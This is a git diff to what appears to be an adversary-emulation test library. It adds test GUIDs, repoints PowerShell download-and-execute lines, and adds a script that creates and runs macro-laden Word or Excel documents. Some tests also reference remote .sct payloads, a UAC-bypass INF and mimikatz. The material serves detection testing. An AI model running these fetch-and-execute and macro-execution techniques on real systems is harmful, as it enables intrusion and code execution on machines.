@@ -175,10 +189,14 @@ Execution is handled by [Invoke-MalDoc](https://github.com/redcanaryco/invoke-at
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** add560ef-20d6-4011-a937-2c340f930911
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | jse_path | jse file to execute with wscript | Path | C:&#92;Users&#92;Public&#92;art.jse|
 | ms_product | Maldoc application Word or Excel | String | Word|
@@ -188,7 +206,8 @@ Execution is handled by [Invoke-MalDoc](https://github.com/redcanaryco/invoke-at
 
 
 ```powershell
-IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing)
+[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
 $macrocode = "   Open `"#{jse_path}`" For Output As #1`n   Write #1, `"WScript.Quit`"`n   Close #1`n   a = Shell(`"cmd.exe /c wscript.exe //E:jscript #{jse_path}`", vbNormalFocus)`n"
 Invoke-MalDoc -macroCode $macrocode -officeProduct "#{ms_product}"
 ```
@@ -205,7 +224,7 @@ try {
   $process = "#{ms_product}"; if ( $process -eq "Word") {$process = "winword"}
   Stop-Process -Name $process
   exit 0
-} catch { exit 1 } 
+} catch { exit 1 }
 ```
 ##### Get Prereq Commands:
 ```powershell
@@ -224,10 +243,14 @@ Microsoft Office creating then launching a .bat script from an AppData directory
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 9215ea92-1ded-41b7-9cd6-79f9a78397aa
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | bat_path | Path to malicious .bat file | String | $("$env:temp&#92;art1204.bat")|
 | ms_product | Maldoc application Word or Excel | String | Word|
@@ -237,7 +260,8 @@ Microsoft Office creating then launching a .bat script from an AppData directory
 
 
 ```powershell
-IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing)
+[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
 $macrocode = "   Open `"#{bat_path}`" For Output As #1`n   Write #1, `"calc.exe`"`n   Close #1`n   a = Shell(`"cmd.exe /c $bat_path `", vbNormalFocus)`n"
 Invoke-MalDoc -macroCode $macrocode -officeProduct #{ms_product}
 ```
@@ -254,7 +278,7 @@ try {
   $process = "#{ms_product}"; if ( $process -eq "Word") {$process = "winword"}
   Stop-Process -Name $process
   exit 0
-} catch { exit 1 } 
+} catch { exit 1 }
 ```
 ##### Get Prereq Commands:
 ```powershell
@@ -278,10 +302,14 @@ with Excel matches that of the local system. This username can be found under Fi
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 4ea1fc97-8a46-4b4e-ba48-af43d2a98052
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | download_url | Download URL | String | https://live.sysinternals.com/procexp.exe|
 | uname | Username for pathing | String | $env:Username|
@@ -362,7 +390,7 @@ try {
   New-Object -COMObject "Excel.Application" | Out-Null
   Stop-Process -Name "Excel"
   exit 0
-} catch { exit 1 } 
+} catch { exit 1 }
 ```
 ##### Get Prereq Commands:
 ```powershell
@@ -383,6 +411,10 @@ and pull down the script and execute it. By default the payload will execute cal
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** a19ee671-ed98-4e9d-b19c-d1954a51585a
+
+
+
 
 
 
@@ -390,7 +422,8 @@ and pull down the script and execute it. By default the payload will execute cal
 
 
 ```powershell
-IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing)
+[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
 Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1204.002\src\chromeexec-macrocode.txt" -officeProduct "Word" -sub "ExecChrome"
 ```
 
@@ -404,7 +437,7 @@ Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1204.002\src\chromeexec-macrocode
 try {
   $wdApp = New-Object -COMObject "Word.Application"
   Stop-Process -Name "winword"
-  exit 0 } catch { exit 1 } 
+  exit 0 } catch { exit 1 }
 ```
 ##### Get Prereq Commands:
 ```powershell
@@ -416,7 +449,7 @@ Write-Host "You will need to install Microsoft Word manually to meet this requir
 try {
   $chromeInstalled = (Get-Item (Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\chrome.exe').'(Default)').VersionInfo.FileName
   exit 0
-} catch { exit 1 } 
+} catch { exit 1 }
 ```
 ##### Get Prereq Commands:
 ```powershell
@@ -435,10 +468,14 @@ The Potentially Unwanted Applications (PUA) protection feature in antivirus soft
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 02f35d62-9fdc-4a97-b899-a5d9a876d295
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | pua_url | url to PotentiallyUnwanted.exe | url | http://amtso.eicar.org/PotentiallyUnwanted.exe|
 | pua_file | path to PotentiallyUnwanted.exe | Path | $env:TEMP/PotentiallyUnwanted.exe|
diff --git a/atomics/T1204.002/T1204.002.yaml b/atomics/T1204.002/T1204.002.yaml
index 971dda55..a39afdda 100644
--- a/atomics/T1204.002/T1204.002.yaml
+++ b/atomics/T1204.002/T1204.002.yaml
@@ -36,7 +36,8 @@ atomic_tests:
       Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement"
   executor:
     command: |
-      IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing)
+      [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+      IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
       $macrocode = "   Open `"#{jse_path}`" For Output As #1`n   Write #1, `"WScript.Quit`"`n   Close #1`n   Shell`$ `"cscript.exe #{jse_path}`"`n"
       Invoke-MalDoc -macroCode $macrocode -officeProduct "#{ms_product}"
     cleanup_command: |
@@ -91,7 +92,8 @@ atomic_tests:
       Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement"
   executor:
     command: |
-      IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing)
+      [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+      IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
       $macrocode = "  a = Shell(`"cmd.exe /c choice /C Y /N /D Y /T 3`", vbNormalFocus)"
       Invoke-MalDoc -macroCode $macrocode -officeProduct "#{ms_product}"
     name: powershell
@@ -126,7 +128,8 @@ atomic_tests:
       Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement"
   executor:
     command: |
-      IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing)
+      [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+      IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
       $macrocode = "   Open `"#{jse_path}`" For Output As #1`n   Write #1, `"WScript.Quit`"`n   Close #1`n   a = Shell(`"cmd.exe /c wscript.exe //E:jscript #{jse_path}`", vbNormalFocus)`n"
       Invoke-MalDoc -macroCode $macrocode -officeProduct "#{ms_product}"
     name: powershell
@@ -160,7 +163,8 @@ atomic_tests:
       Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement"
   executor:
     command: |
-      IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing)
+      [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+      IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
       $macrocode = "   Open `"#{bat_path}`" For Output As #1`n   Write #1, `"calc.exe`"`n   Close #1`n   a = Shell(`"cmd.exe /c $bat_path `", vbNormalFocus)`n"
       Invoke-MalDoc -macroCode $macrocode -officeProduct #{ms_product}
     name: powershell
@@ -285,7 +289,8 @@ atomic_tests:
       Write-Host "You will need to install Google Chrome manually to meet this requirement"
   executor:
     command: |
-        IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing)
+        [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+        IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
         Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1204.002\src\chromeexec-macrocode.txt" -officeProduct "Word" -sub "ExecChrome"
     name: powershell
 
diff --git a/atomics/T1204.002/src/Invoke-MalDoc.ps1 b/atomics/T1204.002/src/Invoke-MalDoc.ps1
new file mode 100644
index 00000000..b567ad56
--- /dev/null
+++ b/atomics/T1204.002/src/Invoke-MalDoc.ps1
@@ -0,0 +1,100 @@
+function Invoke-MalDoc {
+    <#
+    .SYNOPSIS
+    A module to programatically execute Microsoft Word and Exel Documents containing macros.
+
+    .DESCRIPTION
+    A module to programatically execute Microsoft Word and Exel Documents containing macros. The module will temporarily add a registry key to allow PowerShell to interact with VBA.
+    .PARAMETER macroCode
+    [Required] The VBA code to be executed. By default, this macro code will be wrapped in a sub routine, called "Test" by default. If you don't want your macro code to be wrapped in a subroutine use the `-noWrap` flag. To specify the subroutine name use the `-sub` parameter.
+    .PARAMETER macroFile
+    [Required] A file containing the VBA code to be executed. To specify the subroutine name to be called use the `-sub` parameter.
+    .PARAMETER officeVersion
+    [Optional] The Microsoft Office version to use for executing the document. e.g. "16.0". The version will be determined Programmatically if not specified.
+    .PARAMETER officeProduct
+    [Required] The Microsoft Office application in which to create and execute the macro, either "Word" or "Excel".
+    .PARAMETER sub
+    [Optional] The name of the subroutine in the macro code to call for execution. Also the name of the subroutine to wrap the supplied `macroCode` in if `noWrap` is not specified.
+    .PARAMETER noWrap
+    [Optional] A switch that specifies that the supplied `macroCode` should be used as-is and not wrapped in a subroutine.
+    
+    .EXAMPLE
+    C:\PS> Invoke-Maldoc -macroCode "MsgBox `"Hello`"" -officeProduct "Word"
+    -----------
+    Create a macro enabled Microsoft Word Document. The macro code `MsgBox "Hello"` will be wrapped inside of a subroutine call "Test" and then executed.
+    
+    .EXAMPLE
+    C:\PS> $macroCode = Get-Content path/to/macro.txt -Raw
+    C:\PS> Invoke-Maldoc -macroCode $macroCode -officeProduct "Word"
+    -----------
+    Create a macro enabled Microsoft Word Document. The macro code read from `path/to/macro.txt` will be wrapped inside of a subroutine call "Test" and then executed.
+    
+    .EXAMPLE
+    C:\PS> Invoke-Maldoc -macroCode "MsgBox `"Hello`"" -officeProduct "Excel" -sub "DoIt"
+    -----------
+    Create a macro enabled Microsoft Excel Document. The macro code `MsgBox "Hello"` will be wrapped inside of a subroutine call "DoIt" and then executed.
+
+    .EXAMPLE
+    C:\PS> Invoke-Maldoc -macroCode "Sub Exec()`nMsgBox `"Hello`"`nEnd Sub" -officeProduct "Word" -noWrap -sub "Exec"
+    -----------
+    Create a macro enabled Microsoft Word Document. The macroCode will be unmodified (i.e. not wrapped insided a subroutine) and the "Exec" subroutine will be executed.
+
+    .EXAMPLE
+    C:\PS> Invoke-Maldoc -macroFile "C:\AtomicRedTeam\atomics\T1003\src\macro.txt" -officeProduct "Word" -sub "DoIt"
+    -----------
+    Create a macro enabled Microsoft Word Document. The macroCode will be read from the specified file and the "DoIt" subroutine will be executed.
+
+#>
+
+    Param(
+        [Parameter(Position = 0, Mandatory = $True, ParameterSetName = "code")]
+        [String]$macroCode,
+
+        [Parameter(Position = 0, Mandatory = $True, ParameterSetName = "file")]
+        [String]$macroFile,
+
+        [Parameter(Position = 1, Mandatory = $False)]
+        [String]$officeVersion,
+
+        [Parameter(Position = 2, Mandatory = $True)]
+        [ValidateSet("Word", "Excel")]
+        [String]$officeProduct,
+
+        [Parameter(Position = 3, Mandatory = $false)]
+        [String]$sub = "Test",
+
+        [Parameter(Position = 4, Mandatory = $false, ParameterSetName = "code")]
+        [switch]$noWrap
+    )
+
+    $app = New-Object -ComObject "$officeProduct.Application"
+    if (-not $officeVersion) { $officeVersion = $app.Version } 
+    $Key = "HKCU:\Software\Microsoft\Office\$officeVersion\$officeProduct\Security\"
+    if (-not (Test-Path $key)) { New-Item $Key }
+    Set-ItemProperty -Path $Key -Name 'AccessVBOM' -Value 1
+
+    if ($macroFile) {
+        $macroCode = Get-Content $macroFile -Raw
+    }
+    elseif (-not $noWrap) {
+        $macroCode = "Sub $sub()`n" + $macroCode + "`nEnd Sub"
+    }
+
+    if ($officeProduct -eq "Word") {
+        $doc = $app.Documents.Add()
+    }
+    else {
+        $doc = $app.Workbooks.Add()
+    }
+    $comp = $doc.VBProject.VBComponents.Add(1)
+    $comp.CodeModule.AddFromString($macroCode)
+    $app.Run($sub)
+    $doc.Close(0)
+    $app.Quit()
+    [System.Runtime.InteropServices.Marshal]::ReleaseComObject($comp) | Out-Null
+    [System.Runtime.InteropServices.Marshal]::ReleaseComObject($doc) | Out-Null
+    [System.Runtime.InteropServices.Marshal]::ReleaseComObject($app) | Out-Null
+    [System.GC]::Collect()
+    [System.GC]::WaitForPendingFinalizers()
+    Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$officeVersion\$officeProduct\Security\" -Name 'AccessVBOM' -ErrorAction Ignore
+}
\ No newline at end of file
diff --git a/atomics/T1207/T1207.md b/atomics/T1207/T1207.md
index f34d481e..a93d1f53 100644
--- a/atomics/T1207/T1207.md
+++ b/atomics/T1207/T1207.md
@@ -28,10 +28,14 @@ The easiest is to run elevated and as a Domain Admin user.
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 0f4c5eb0-98a0-4496-9c3d-656b4f2bc8f6
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | object | Targeted object (for machine account do not forget to add final '$') | string | bruce.wayne|
 | attribute | Object attribute to edit, interesting ones: badpwdcount, primaryGroupId, SIDHistory... | string | badpwdcount|
@@ -79,7 +83,7 @@ Stop-Process -Name "mimikatz" -Force -ErrorAction Ignore
 ##### Check Prereq Commands:
 ```powershell
 $mimikatz_path = cmd /c echo #{mimikatz_path}
-if (Test-Path $mimikatz_path) {exit 0} else {exit 1} 
+if (Test-Path $mimikatz_path) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
@@ -92,7 +96,7 @@ Move-Item $env:TEMP\mimikatz\x64\mimikatz.exe $mimikatz_path -Force
 ##### Description: PsExec tool from Sysinternals must exist on disk at specified location (#{psexec_path})
 ##### Check Prereq Commands:
 ```powershell
-if (Test-Path "#{psexec_path}") { exit 0} else { exit 1} 
+if (Test-Path "#{psexec_path}") { exit 0} else { exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
diff --git a/atomics/T1216.001/T1216.001.md b/atomics/T1216.001/T1216.001.md
index 629309d6..90da7ee0 100644
--- a/atomics/T1216.001/T1216.001.md
+++ b/atomics/T1216.001/T1216.001.md
@@ -17,10 +17,14 @@ Executes the signed PubPrn.vbs script with options to download and execute an ar
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 9dd29a1f-1e16-4862-be83-913b10a88f6c
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | remote_payload | A remote payload to execute using PubPrn.vbs. | Url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1216.001/src/T1216.001.sct|
 
diff --git a/atomics/T1216/T1216.md b/atomics/T1216/T1216.md
index d14d2c8b..75554d61 100644
--- a/atomics/T1216/T1216.md
+++ b/atomics/T1216/T1216.md
@@ -18,10 +18,14 @@ Upon execution, calc.exe will be launched.
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 275d963d-3f36-476c-8bef-a2a3960ee6eb
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | command_to_execute | A PowerShell command to execute. | string | Start-Process calc|
 
@@ -47,10 +51,14 @@ Executes the signed manage-bde.wsf script with options to execute an arbitrary c
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 2a8f2d3c-3dec-4262-99dd-150cb2a4d63a
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | command_to_execute | A command to execute. | Path | %windir%&#92;System32&#92;calc.exe|
 
diff --git a/atomics/T1217/T1217.md b/atomics/T1217/T1217.md
index 0635173c..19cac217 100644
--- a/atomics/T1217/T1217.md
+++ b/atomics/T1217/T1217.md
@@ -31,10 +31,14 @@ Searches for Mozilla Firefox's places.sqlite file (on Linux distributions) that
 **Supported Platforms:** Linux
 
 
+**auto_generated_guid:** 3a41f169-a5ab-407f-9269-abafdb5da6c2
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | output_file | Path where captured results will be placed. | Path | /tmp/T1217-Firefox.txt|
 
@@ -65,10 +69,14 @@ Searches for Mozilla Firefox's places.sqlite file (on macOS) that contains bookm
 **Supported Platforms:** macOS
 
 
+**auto_generated_guid:** 1ca1f9c7-44bc-46bb-8c85-c50e2e94267b
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | output_file | Path where captured results will be placed. | Path | /tmp/T1217_Firefox.txt|
 
@@ -99,10 +107,14 @@ Searches for Google Chrome's Bookmark file (on macOS) that contains bookmarks in
 **Supported Platforms:** macOS
 
 
+**auto_generated_guid:** b789d341-154b-4a42-a071-9111588be9bc
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | output_file | Path where captured results will be placed. | Path | /tmp/T1217-Chrome.txt|
 
@@ -134,6 +146,10 @@ Upon execution, paths that contain bookmark files will be displayed.
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** faab755e-4299-48ec-8202-fc7885eb6545
+
+
+
 
 
 
@@ -159,6 +175,10 @@ Upon execution, paths that contain bookmark files will be displayed.
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 76f71e2f-480e-4bed-b61e-398fe17499d5
+
+
+
 
 
 
@@ -184,6 +204,10 @@ Upon execution, paths that contain bookmark files will be displayed.
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 4312cdbc-79fc-4a9c-becc-53d49c734bc5
+
+
+
 
 
 
@@ -208,6 +232,10 @@ This test will list the bookmarks for Internet Explorer that are found in the Fa
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 727dbcdb-e495-4ab1-a6c4-80c7f77aef85
+
+
+
 
 
 
diff --git a/atomics/T1218.001/T1218.001.md b/atomics/T1218.001/T1218.001.md
index ef702c12..270b1aa0 100644
--- a/atomics/T1218.001/T1218.001.md
+++ b/atomics/T1218.001/T1218.001.md
@@ -30,10 +30,14 @@ Upon execution calc.exe will open
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 5cb87818-0d7c-4469-b7ef-9224107aebe8
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | local_chm_file | Local .chm payload | path | PathToAtomicsFolder&#92;T1218.001&#92;src&#92;T1218.001.chm|
 
@@ -52,7 +56,7 @@ hh.exe #{local_chm_file}
 ##### Description: The payload must exist on disk at specified location (#{local_chm_file})
 ##### Check Prereq Commands:
 ```powershell
-if (Test-Path #{local_chm_file}) {exit 0} else {exit 1} 
+if (Test-Path #{local_chm_file}) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
@@ -73,10 +77,14 @@ Upon execution displays an error saying the file cannot be open
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 0f8af516-9818-4172-922b-42986ef1e81d
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | remote_chm_file | Remote .chm payload | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.001/src/T1218.001.chm|
 
@@ -102,10 +110,14 @@ Executes a CHM file with the default Shortcut Command method.
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 29d6f0d7-be63-4482-8827-ea77126c1ef7
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | chm_file_path | Default path of CHM | string | Test.chm|
 | hh_file_path | path of modified HH.exe | path | $env:windir&#92;hh.exe|
@@ -127,7 +139,7 @@ Invoke-ATHCompiledHelp -HHFilePath #{hh_file_path} -CHMFilePath #{chm_file_path}
 ```powershell
 $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
 if (-not $RequiredModule) {exit 1}
-if (-not $RequiredModule.ExportedCommands['Invoke-ATHCompiledHelp']) {exit 1} else {exit 0} 
+if (-not $RequiredModule.ExportedCommands['Invoke-ATHCompiledHelp']) {exit 1} else {exit 0}
 ```
 ##### Get Prereq Commands:
 ```powershell
@@ -146,10 +158,14 @@ Executes a CHM file with the ITS protocol handler.
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** b4094750-5fc7-4e8e-af12-b4e36bf5e7f6
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | hh_file_path | path of modified HH.exe | path | $env:windir&#92;hh.exe|
 | infotech_storage_handler | Default InfoTech Storage Protocol Handler | string | its|
@@ -172,7 +188,7 @@ Invoke-ATHCompiledHelp -InfoTechStorageHandler #{infotech_storage_handler} -HHFi
 ```powershell
 $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
 if (-not $RequiredModule) {exit 1}
-if (-not $RequiredModule.ExportedCommands['Invoke-ATHCompiledHelp']) {exit 1} else {exit 0} 
+if (-not $RequiredModule.ExportedCommands['Invoke-ATHCompiledHelp']) {exit 1} else {exit 0}
 ```
 ##### Get Prereq Commands:
 ```powershell
@@ -191,10 +207,14 @@ Executes a CHM file simulating a user double click.
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 5decef42-92b8-4a93-9eb2-877ddcb9401a
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | chm_file_path | Default path of CHM | string | Test.chm|
 
@@ -215,7 +235,7 @@ Invoke-ATHCompiledHelp -SimulateUserDoubleClick -CHMFilePath #{chm_file_path}
 ```powershell
 $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
 if (-not $RequiredModule) {exit 1}
-if (-not $RequiredModule.ExportedCommands['Invoke-ATHCompiledHelp']) {exit 1} else {exit 0} 
+if (-not $RequiredModule.ExportedCommands['Invoke-ATHCompiledHelp']) {exit 1} else {exit 0}
 ```
 ##### Get Prereq Commands:
 ```powershell
@@ -234,10 +254,14 @@ Executes a CHM file with a defined script engine, ITS Protocol Handler, and help
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 4f83adda-f5ec-406d-b318-9773c9ca92e5
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | topic_extension | Default Help Topic | string | html|
 | hh_file_path | path of modified HH.exe | path | $env:windir&#92;hh.exe|
@@ -262,7 +286,7 @@ Invoke-ATHCompiledHelp -ScriptEngine #{script_engine} -InfoTechStorageHandler #{
 ```powershell
 $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
 if (-not $RequiredModule) {exit 1}
-if (-not $RequiredModule.ExportedCommands['Invoke-ATHCompiledHelp']) {exit 1} else {exit 0} 
+if (-not $RequiredModule.ExportedCommands['Invoke-ATHCompiledHelp']) {exit 1} else {exit 0}
 ```
 ##### Get Prereq Commands:
 ```powershell
@@ -281,10 +305,14 @@ Executes a CHM file using the Shortcut Command method with a defined ITS Protoco
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 15756147-7470-4a83-87fb-bb5662526247
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | topic_extension | Default Help Topic | string | html|
 | hh_file_path | path of modified HH.exe | path | $env:windir&#92;hh.exe|
@@ -308,7 +336,7 @@ Invoke-ATHCompiledHelp -ExecuteShortcutCommand -InfoTechStorageHandler #{infotec
 ```powershell
 $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
 if (-not $RequiredModule) {exit 1}
-if (-not $RequiredModule.ExportedCommands['Invoke-ATHCompiledHelp']) {exit 1} else {exit 0} 
+if (-not $RequiredModule.ExportedCommands['Invoke-ATHCompiledHelp']) {exit 1} else {exit 0}
 ```
 ##### Get Prereq Commands:
 ```powershell
diff --git a/atomics/T1218.002/T1218.002.md b/atomics/T1218.002/T1218.002.md
index 8284a94a..95b2ed09 100644
--- a/atomics/T1218.002/T1218.002.md
+++ b/atomics/T1218.002/T1218.002.md
@@ -22,10 +22,14 @@ Upon execution calc.exe will be launched
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 037e9d8a-9e46-4255-8b33-2ae3b545ca6f
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | cpl_file_path | path to cpl file | path | PathToAtomicsFolder&#92;T1218.002&#92;bin&#92;calc.cpl|
 
@@ -44,7 +48,7 @@ control.exe #{cpl_file_path}
 ##### Description: Cpl file must exist on disk at specified location (#{cpl_file_path})
 ##### Check Prereq Commands:
 ```powershell
-if (Test-Path #{cpl_file_path}) {exit 0} else {exit 1} 
+if (Test-Path #{cpl_file_path}) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
diff --git a/atomics/T1218.003/T1218.003.md b/atomics/T1218.003/T1218.003.md
index 6fcb3da3..57adcbec 100644
--- a/atomics/T1218.003/T1218.003.md
+++ b/atomics/T1218.003/T1218.003.md
@@ -21,10 +21,14 @@ Adversaries may supply CMSTP.exe with INF files infected with malicious commands
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 34e63321-9683-496b-bbc1-7566bc55e624
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | inf_file_path | Path to the INF file | path | PathToAtomicsFolder&#92;T1218.003&#92;src&#92;T1218.003.inf|
 
@@ -43,7 +47,7 @@ cmstp.exe /s #{inf_file_path}
 ##### Description: INF file must exist on disk at specified location (#{inf_file_path})
 ##### Check Prereq Commands:
 ```powershell
-if (Test-Path #{inf_file_path}) {exit 0} else {exit 1} 
+if (Test-Path #{inf_file_path}) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
@@ -63,10 +67,14 @@ Adversaries may invoke cmd.exe (or other malicious commands) by embedding them i
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 748cb4f6-2fb3-4e97-b7ad-b22635a09ab0
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | inf_file_uac | Path to the INF file | path | PathToAtomicsFolder&#92;T1218.003&#92;src&#92;T1218.003_uacbypass.inf|
 
@@ -85,7 +93,7 @@ cmstp.exe /s #{inf_file_uac} /au
 ##### Description: INF file must exist on disk at specified location (#{inf_file_uac})
 ##### Check Prereq Commands:
 ```powershell
-if (Test-Path #{inf_file_uac}) {exit 0} else {exit 1} 
+if (Test-Path #{inf_file_uac}) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
diff --git a/atomics/T1218.004/T1218.004.md b/atomics/T1218.004/T1218.004.md
index c7a174a8..52a9a6bb 100644
--- a/atomics/T1218.004/T1218.004.md
+++ b/atomics/T1218.004/T1218.004.md
@@ -32,10 +32,14 @@ If no output is displayed the test executed successfuly.
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** ffd9c807-d402-47d2-879d-f915cf2a3a94
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
